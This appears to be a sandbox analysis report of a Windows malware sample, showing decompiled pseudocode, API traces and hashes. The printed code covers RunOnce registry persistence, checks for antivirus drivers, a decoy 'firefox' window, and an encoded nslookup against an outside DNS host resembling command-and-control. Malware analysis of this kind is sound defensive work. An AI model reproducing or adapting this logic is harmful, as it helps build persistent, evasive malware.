                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x2c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x34));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x38));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x40));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x44));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x4c));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x50));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x58));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x5c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
                                      					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
                                      					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
                                      					_a4 = _t47;
                                      					if(_t94 == 0) {
                                      						wsprintfW(_t47, L"undefined");
                                      					} else {
                                      						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
                                      					}
                                      					lstrcatW(_t96,  *(_t91 + 0x64));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96, _a4);
                                      					lstrcatW(_t96, "&");
                                      					VirtualFree(_a4, 0, 0x8000); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
                                      					lstrcatW(_t96,  *(_t91 + 0x78));
                                      					lstrcatW(_t96, "=");
                                      					lstrcatW(_t96,  *(_t91 + 0x7c));
                                      					lstrcatW(_t96, "&");
                                      				}
                                      				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
                                      				return _t96;
                                      			}







                                      0x004069a4
                                      0x004069a7
                                      0x004069b8
                                      0x004069c1
                                      0x004069c9
                                      0x004069d2
                                      0x004069da
                                      0x004069da
                                      0x004069df
                                      0x004069e5
                                      0x004069ed
                                      0x004069f3
                                      0x004069fb
                                      0x004069fb
                                      0x00406a01
                                      0x00406a07
                                      0x00406a0f
                                      0x00406a15
                                      0x00406a1d
                                      0x00406a1d
                                      0x00406a23
                                      0x00406a29
                                      0x00406a31
                                      0x00406a37
                                      0x00406a3f
                                      0x00406a3f
                                      0x00406a45
                                      0x00406a4b
                                      0x00406a53
                                      0x00406a59
                                      0x00406a61
                                      0x00406a61
                                      0x00406a67
                                      0x00406a6d
                                      0x00406a75
                                      0x00406a7b
                                      0x00406a83
                                      0x00406a83
                                      0x00406a89
                                      0x00406a8f
                                      0x00406a97
                                      0x00406a9d
                                      0x00406aa5
                                      0x00406aa5
                                      0x00406aab
                                      0x00406ab1
                                      0x00406ab9
                                      0x00406abf
                                      0x00406ac7
                                      0x00406ac7
                                      0x00406acd
                                      0x00406ad3
                                      0x00406adb
                                      0x00406ae1
                                      0x00406ae9
                                      0x00406ae9
                                      0x00406aef
                                      0x00406afc
                                      0x00406b02
                                      0x00406b05
                                      0x00406b0a
                                      0x00406b27
                                      0x00406b0c
                                      0x00406b16
                                      0x00406b1c
                                      0x00406b34
                                      0x00406b3c
                                      0x00406b42
                                      0x00406b4a
                                      0x00406b56
                                      0x00406b56
                                      0x00406b60
                                      0x00406b66
                                      0x00406b6e
                                      0x00406b74
                                      0x00406b7c
                                      0x00406b7c
                                      0x00406b88
                                      0x00406b92

                                      APIs
                                      • lstrcatW.KERNEL32(?,?), ref: 004069C1
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 004069C9
                                      • lstrcatW.KERNEL32(?,?), ref: 004069D2
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 004069DA
                                      • lstrcatW.KERNEL32(?,?), ref: 004069E5
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 004069ED
                                      • lstrcatW.KERNEL32(?,?), ref: 004069F3
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 004069FB
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A07
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A0F
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A15
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A1D
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A29
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A31
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A37
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A3F
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A4B
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A53
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A59
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A61
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A6D
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A75
                                      • lstrcatW.KERNEL32(?,004048B6), ref: 00406A7B
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406A83
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A8F
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406A97
                                      • lstrcatW.KERNEL32(?,?), ref: 00406A9D
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AA5
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AB1
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406AB9
                                      • lstrcatW.KERNEL32(?,?), ref: 00406ABF
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AC7
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AD3
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406ADB
                                      • lstrcatW.KERNEL32(?,?), ref: 00406AE1
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406AE9
                                      • VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00406AFC
                                      • wsprintfW.USER32 ref: 00406B16
                                      • wsprintfW.USER32 ref: 00406B27
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B34
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406B3C
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B42
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406B4A
                                      • VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00406B56
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B66
                                      • lstrcatW.KERNEL32(?,004103F0), ref: 00406B6E
                                      • lstrcatW.KERNEL32(?,?), ref: 00406B74
                                      • lstrcatW.KERNEL32(?,004103F4), ref: 00406B7C
                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00406B7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                      • String ID: %x%x$undefined
                                      • API String ID: 3872469520-3801831566
                                      • Opcode ID: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
                                      • Instruction ID: 157d45b09fe4d6cbf2a129cbf998294f04408a9e253f235917979037099c56e6
                                      • Opcode Fuzzy Hash: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
                                      • Instruction Fuzzy Hash: 80511B31281669B7CB273B658C49FDF3A19EF86700F124061F91028096CFBD9592DEAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 94%
                                      			E00402960(char* __ecx, void* __eflags) {
                                      				void* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				short _v32;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				intOrPtr _v76;
                                      				intOrPtr _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				intOrPtr _v96;
                                      				intOrPtr _v100;
                                      				intOrPtr _v104;
                                      				intOrPtr _v108;
                                      				intOrPtr _v112;
                                      				intOrPtr _v116;
                                      				intOrPtr _v120;
                                      				intOrPtr _v124;
                                      				intOrPtr _v128;
                                      				intOrPtr _v132;
                                      				intOrPtr _v136;
                                      				short _v140;
                                      				long _t45;
                                      				int _t47;
                                      				char* _t58;
                                      
                                      				_t58 = __ecx;
                                      				_v32 = 0x520050;
                                      				_v28 = 0x440049;
                                      				_push(0x41);
                                      				_v24 = 0x520055;
                                      				_v20 = 0x530041;
                                      				_v16 = 0x4b0048;
                                      				_v12 = 0x41;
                                      				E00407C60( &_v32, lstrlenW( &_v32)); // executed
                                      				_v140 = 0x4f0053;
                                      				_t10 =  &_v8; // 0x402c45
                                      				_v136 = 0x540046;
                                      				_v132 = 0x410057;
                                      				_v128 = 0x450052;
                                      				_v124 = 0x4d005c;
                                      				_v120 = 0x630069;
                                      				_v116 = 0x6f0072;
                                      				_v112 = 0x6f0073;
                                      				_v108 = 0x740066;
                                      				_v104 = 0x57005c;
                                      				_v100 = 0x6e0069;
                                      				_v96 = 0x6f0064;
                                      				_v92 = 0x730077;
                                      				_v88 = 0x43005c;
                                      				_v84 = 0x720075;
                                      				_v80 = 0x650072;
                                      				_v76 = 0x74006e;
                                      				_v72 = 0x650056;
                                      				_v68 = 0x730072;
                                      				_v64 = 0x6f0069;
                                      				_v60 = 0x5c006e;
                                      				_v56 = 0x750052;
                                      				_v52 = 0x4f006e;
                                      				_v48 = 0x63006e;
                                      				_v44 = 0x65;
                                      				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0, _t10, 0); // executed
                                      				if(_t45 != 0) {
                                      					return 0;
                                      				} else {
                                      					_t47 = lstrlenW(_t58);
                                      					_t37 =  &_v8; // 0x402c45, executed
                                      					RegSetValueExW( *_t37,  &_v32, 0, 1, _t58, _t47 + _t47); // executed
                                      					asm("sbb esi, esi"); // executed
                                      					RegCloseKey(_v8);
                                      					_t39 =  &(_t58[1]); // 0x1
                                      					return _t39;
                                      				}
                                      			}






































                                      0x0040296b
                                      0x0040296d
                                      0x00402979
                                      0x00402980
                                      0x00402984
                                      0x0040298c
                                      0x00402993
                                      0x0040299a
                                      0x004029a8
                                      0x004029b0
                                      0x004029ba
                                      0x004029bd
                                      0x004029c7
                                      0x004029ce
                                      0x004029eb
                                      0x004029f8
                                      0x004029ff
                                      0x00402a06
                                      0x00402a0d
                                      0x00402a14
                                      0x00402a1b
                                      0x00402a22
                                      0x00402a29
                                      0x00402a30
                                      0x00402a37
                                      0x00402a3e
                                      0x00402a45
                                      0x00402a4c
                                      0x00402a53
                                      0x00402a5a
                                      0x00402a61
                                      0x00402a68
                                      0x00402a6f
                                      0x00402a76
                                      0x00402a7d
                                      0x00402a84
                                      0x00402a8c
                                      0x00402ac7
                                      0x00402a8e
                                      0x00402a8f
                                      0x00402aa1
                                      0x00402aa4
                                      0x00402aaf
                                      0x00402ab1
                                      0x00402ab7
                                      0x00402abf
                                      0x00402abf

                                      APIs
                                      • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0040299D
                                        • Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                        • Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                        • Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                        • Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                        • Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                        • Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                        • Part of subcall function 00407C60: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00407D73
                                      • RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,E,@,00000000), ref: 00402A84
                                      • lstrlenW.KERNEL32(00000000), ref: 00402A8F
                                      • RegSetValueExW.KERNEL32(E,@,00520050,00000000,00000001,00000000,00000000), ref: 00402AA4
                                      • RegCloseKey.KERNEL32(?), ref: 00402AB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                      • String ID: A$E,@$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                      • API String ID: 553367697-1908525871
                                      • Opcode ID: bc2aa759d9655fff48c3731314f56cd013a72bf6e49cbd10b87566378500ce0d
                                      • Instruction ID: 6d84f0b14520ef3984e43a4999751383e09c14a2564039d175e156e7e031e40b
                                      • Opcode Fuzzy Hash: bc2aa759d9655fff48c3731314f56cd013a72bf6e49cbd10b87566378500ce0d
                                      • Instruction Fuzzy Hash: A431DBB090021CDFEB20CF91E949BEDBFB5FB01709F108119D5187A292D7BA4948CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 85%
                                      			E00402D30() {
                                      				struct _WNDCLASSEXW _v52;
                                      				struct tagMSG _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				char _v96;
                                      				void* _t37;
                                      				short _t42;
                                      				void* _t49;
                                      				void* _t59;
                                      				void* _t60;
                                      				void* _t61;
                                      				void* _t62;
                                      				void* _t67;
                                      				void* _t69;
                                      				long _t71;
                                      
                                      				_push(_t62);
                                      				_push(_t69);
                                      				_v84.message = 0x6c006b;
                                      				_push(_t67);
                                      				_v84.wParam = 0x660069;
                                      				_v84.lParam = 0x73002e;
                                      				_v84.time = 0x730079;
                                      				_v84.pt = 0;
                                      				_v96 = 0x6c006b;
                                      				_v92 = 0x2e0031;
                                      				_v88 = 0x790073;
                                      				_v84.hwnd = 0x73;
                                      				_t37 = E00402F50( &(_v84.message)); // executed
                                      				if(_t37 != 0) {
                                      					L5:
                                      					_v52.cbSize = 0x30;
                                      					_v52.style = 3;
                                      					_v52.lpfnWndProc = E00402C50;
                                      					_v52.cbClsExtra = 0;
                                      					_v52.cbWndExtra = 0;
                                      					_v52.hInstance = GetModuleHandleW(0);
                                      					_v52.hIcon = 0;
                                      					_v52.hCursor = LoadCursorW(0, 0x7f00);
                                      					_v52.hbrBackground = 6;
                                      					_v52.lpszMenuName = 0;
                                      					_v52.lpszClassName = L"win32app";
                                      					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
                                      					_t42 = RegisterClassExW( &_v52);
                                      					_push(0);
                                      					if(_t42 != 0) {
                                      						GetModuleHandleW();
                                      						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
                                      						SetWindowLongW(_t71, 0xfffffff0, 0);
                                      						if(_t71 != 0) {
                                      							ShowWindow(_t71, 5);
                                      							UpdateWindow(_t71);
                                      							_t49 = CreateThread(0, 0, E00402D10, _t71, 0, 0);
                                      							if(_t49 != 0) {
                                      								CloseHandle(_t49);
                                      							}
                                      							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
                                      								L15:
                                      								ExitThread(0);
                                      							} else {
                                      								do {
                                      									TranslateMessage( &_v84);
                                      								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
                                      								goto L15;
                                      							}
                                      						}
                                      						ExitThread(_t71);
                                      					}
                                      					ExitThread();
                                      				}
                                      				_t59 = E00402F50( &_v96); // executed
                                      				if(_t59 != 0) {
                                      					goto L5;
                                      				}
                                      				_v84.message = 0x730066;
                                      				_v84.wParam = 0x660064;
                                      				_v84.lParam = 0x2e0077;
                                      				_v84.time = 0x790073;
                                      				_v84.pt = 0x73;
                                      				_t60 = E00402F50( &(_v84.message)); // executed
                                      				if(_t60 != 0) {
                                      					goto L15;
                                      				}
                                      				_t61 = E004030A0(_t62, _t67, _t69); // executed
                                      				if(_t61 != 0) {
                                      					goto L15;
                                      				}
                                      				_push(_t61); // executed
                                      				E00402AD0(); // executed
                                      				goto L5;
                                      			}


















                                      0x00402d39
                                      0x00402d3a
                                      0x00402d3d
                                      0x00402d45
                                      0x00402d4a
                                      0x00402d52
                                      0x00402d5a
                                      0x00402d62
                                      0x00402d67
                                      0x00402d6f
                                      0x00402d77
                                      0x00402d7f
                                      0x00402d87
                                      0x00402d8e
                                      0x00402de9
                                      0x00402df1
                                      0x00402df9
                                      0x00402e01
                                      0x00402e09
                                      0x00402e11
                                      0x00402e22
                                      0x00402e26
                                      0x00402e3d
                                      0x00402e41
                                      0x00402e49
                                      0x00402e51
                                      0x00402e5f
                                      0x00402e68
                                      0x00402e6e
                                      0x00402e73
                                      0x00402e7b
                                      0x00402eaf
                                      0x00402eb4
                                      0x00402ebc
                                      0x00402ec8
                                      0x00402ecf
                                      0x00402ee3
                                      0x00402eeb
                                      0x00402eee
                                      0x00402eee
                                      0x00402f09
                                      0x00402f3d
                                      0x00402f3f
                                      0x00402f0b
                                      0x00402f17
                                      0x00402f1c
                                      0x00402f25
                                      0x00000000
                                      0x00402f17
                                      0x00402f09
                                      0x00402ebf
                                      0x00402ebf
                                      0x00402e75
                                      0x00402e75
                                      0x00402d94
                                      0x00402d9b
                                      0x00000000
                                      0x00000000
                                      0x00402da1
                                      0x00402da9
                                      0x00402db1
                                      0x00402db9
                                      0x00402dc1
                                      0x00402dc9
                                      0x00402dd0
                                      0x00000000
                                      0x00000000
                                      0x00402dd6
                                      0x00402ddd
                                      0x00000000
                                      0x00000000
                                      0x00402de3
                                      0x00402de4
                                      0x00000000

                                      APIs
                                        • Part of subcall function 00402F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 00402F74
                                      • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00402E19
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00402E2E
                                      • LoadIconW.USER32 ref: 00402E59
                                      • RegisterClassExW.USER32 ref: 00402E68
                                      • ExitThread.KERNEL32 ref: 00402E75
                                        • Part of subcall function 00402F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402F8D
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402E7B
                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 00402E81
                                      • CreateWindowExW.USER32 ref: 00402EA7
                                      • SetWindowLongW.USER32 ref: 00402EB4
                                      • ExitThread.KERNEL32 ref: 00402EBF
                                        • Part of subcall function 00402F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 00402FA8
                                        • Part of subcall function 00402F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 00402FCF
                                        • Part of subcall function 00402F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 00402FE3
                                        • Part of subcall function 00402F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00402FFA
                                      • ExitThread.KERNEL32 ref: 00402F3F
                                        • Part of subcall function 00402AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
                                        • Part of subcall function 00402AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
                                        • Part of subcall function 00402AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
                                        • Part of subcall function 00402AD0: ExitThread.KERNEL32 ref: 00402C47
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 00402EC8
                                      • UpdateWindow.USER32(00000000), ref: 00402ECF
                                      • CreateThread.KERNEL32 ref: 00402EE3
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 00402EEE
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F05
                                      • TranslateMessage.USER32(?), ref: 00402F1C
                                      • DispatchMessageW.USER32 ref: 00402F23
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402F37
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
                                      • String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
                                      • API String ID: 3011903443-520298170
                                      • Opcode ID: 4a679d84ba6cb8d8a57319f91f88c6eb5e3a57dc7d18787ade47d617a941c88f
                                      • Instruction ID: 6dadb659047271fd80ce1d130f626f3db599e38ffd86fa9de69c1f1ec4dcf306
                                      • Opcode Fuzzy Hash: 4a679d84ba6cb8d8a57319f91f88c6eb5e3a57dc7d18787ade47d617a941c88f
                                      • Instruction Fuzzy Hash: 0F515070248302AFF7109F618D0DB5B7AE4AF44748F10092DF684BA2D1D7F99945CB9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 100%
                                      			E00404D60(CHAR* __ecx, void* __edx) {
                                      				struct _SECURITY_ATTRIBUTES _v16;
                                      				short _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				short _v76;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t24;
                                      				void* _t28;
                                      				void* _t37;
                                      				CHAR* _t43;
                                      				void* _t45;
                                      
                                      				_v76 = 0x73006e;
                                      				_v20 = 0;
                                      				_t37 = __edx;
                                      				_v16.lpSecurityDescriptor = 0;
                                      				_t43 = __ecx;
                                      				_v72 = 0x6f006c;
                                      				_v68 = 0x6b006f;
                                      				_v64 = 0x700075;
                                      				_v60 = 0x250020;
                                      				_v56 = 0x200053;
                                      				_v52 = 0x6e0064;
                                      				_v48 = 0x310073;
                                      				_v44 = 0x73002e;
                                      				_v40 = 0x70006f;
                                      				_v36 = 0x6f0072;
                                      				_v32 = 0x6e0064;
                                      				_v28 = 0x2e0073;
                                      				_v24 = 0x750072;
                                      				_v16.nLength = 0xc;
                                      				_v16.bInheritHandle = 1;
                                      				_t24 = CreatePipe(0x412b10, 0x412b0c,  &_v16, 0); // executed
                                      				if(_t24 != 0) {
                                      					_t24 = SetHandleInformation( *0x412b10, 1, 0);
                                      					if(_t24 == 0) {
                                      						goto L1;
                                      					} else {
                                      						CreatePipe(0x412b08, 0x412b14,  &_v16, 0); // executed
                                      						_t24 = SetHandleInformation( *0x412b14, 1, 0);
                                      						if(_t24 == 0) {
                                      							goto L1;
                                      						} else {
                                      							_t28 = VirtualAlloc(0, 0x2800, 0x3000, 4); // executed
                                      							_t45 = _t28;
                                      							if(_t45 == 0) {
                                      								lstrcpyA(_t43, "fabian wosar <3");
                                      								return 0;
                                      							} else {
                                      								wsprintfW(_t45,  &_v76, _t37);
                                      								E00404B10(_t45); // executed
                                      								E00404CB0(_t37, _t43, _t37, _t43, _t45); // executed
                                      								VirtualFree(_t45, 0, 0x8000); // executed
                                      								return 0;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					L1:
                                      					return _t24 | 0xffffffff;
                                      				}
                                      			}



























                                      0x00404d6b
                                      0x00404d73
                                      0x00404d77
                                      0x00404d79
                                      0x00404d7c
                                      0x00404d81
                                      0x00404d93
                                      0x00404d9a
                                      0x00404da1
                                      0x00404da8
                                      0x00404daf
                                      0x00404db6
                                      0x00404dbd
                                      0x00404dc4
                                      0x00404dcb
                                      0x00404dd2
                                      0x00404dd9
                                      0x00404de0
                                      0x00404de7
                                      0x00404dee
                                      0x00404df5
                                      0x00404dfd
                                      0x00404e19
                                      0x00404e1d
                                      0x00000000
                                      0x00404e1f
                                      0x00404e2f
                                      0x00404e3f
                                      0x00404e43
                                      0x00000000
                                      0x00404e45
                                      0x00404e53
                                      0x00404e59
                                      0x00404e5d
                                      0x00404e9b
                                      0x00404ea9
                                      0x00404e5f
                                      0x00404e65
                                      0x00404e70
                                      0x00404e79
                                      0x00404e86
                                      0x00404e94
                                      0x00404e94
                                      0x00404e5d
                                      0x00404e43
                                      0x00404dff
                                      0x00404dff
                                      0x00404e08
                                      0x00404e08

                                      APIs
                                      • CreatePipe.KERNEL32(00412B10,00412B0C,?,00000000,00000000,00000001,00000000), ref: 00404DF5
                                      • SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E19
                                      • CreatePipe.KERNEL32(00412B08,00412B14,0000000C,00000000), ref: 00404E2F
                                      • SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E3F
                                      • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00404E53
                                      • wsprintfW.USER32 ref: 00404E65
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00404E86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                      • String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
                                      • API String ID: 1490407255-783179298
                                      • Opcode ID: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
                                      • Instruction ID: 87b3df06f302a376c278e654a4a7d1f30e625f23b6bcd530246e45e208265c66
                                      • Opcode Fuzzy Hash: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
                                      • Instruction Fuzzy Hash: FB31D8B1B01308ABEB109F95AD49BEE7FB5FB44714F104036E604F62D1D7F559448BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
